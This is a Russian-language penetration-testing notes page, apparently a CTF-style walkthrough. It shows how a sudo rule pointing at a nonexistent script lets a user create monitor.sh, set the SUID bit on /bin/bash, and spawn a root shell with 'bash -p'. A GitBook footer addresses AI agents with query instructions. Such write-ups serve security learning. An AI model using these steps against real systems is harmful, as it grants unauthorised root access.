> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/privesc/sudoers/sudo-missing-file-linux-privilege-escalation.md).

# Sudo отсутствующий файл — повышение привилегий в Linux

## Что это такое

Повышение привилегий в sudoers начинается с команд, которые пользователь может запускать через `sudo`. Неправильно настроенные бинарные файлы, небезопасные аргументы скриптов, обработка символических ссылок и уязвимые версии sudo могут превратить ограниченные права sudo в оболочку root. Эта конкретная страница посвящена **Sudo (файл не найден)** и делает процесс эксплуатации практичным: определить условие, безопасно его проверить, а затем запустить минимальный полезный код, необходимый для подтверждения воздействия.

## Перечисление

Сначала подтвердите локальный контекст и точную ошибку настройки перед запуском пути эксплуатации.

```bash
sudo -l
sudo --version
```

## Примеры

Мы обнаруживаем уязвимость, связанную с выполнением скрипта с привилегиями sudo.

<figure><img src="/files/aab9fc72e89c771d2374ff3552ef7e59530aea83" alt=""><figcaption></figcaption></figure>

У `monitor.sh` Создать файл кажется невозможным, но мы можем создать скрипт, который будет выполнен от имени root. Начнём с создания необходимых каталогов:

```bash
cd /home/nibbler
mkdir personal
cd !$
mkdir stuff
cd !$
```

Мы помещаем `monitor.sh` файл со следующим содержимым:

```bash
chmod u+s /bin/bash
```

Затем мы запускаем скрипт с привилегиями sudo:

```bash
sudo /home/nibbler/personal/stuff/monitor.sh
```

Это позволяет изменить права доступа к `/bin/bash` добавив бит SUID. Затем мы выполняем следующую команду, чтобы получить оболочку с привилегиями root:

```bash
bash -p
```

<figure><img src="/files/3411754bc1f1675754a186a1b5272942fd7703e5" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/privesc/sudoers/sudo-missing-file-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
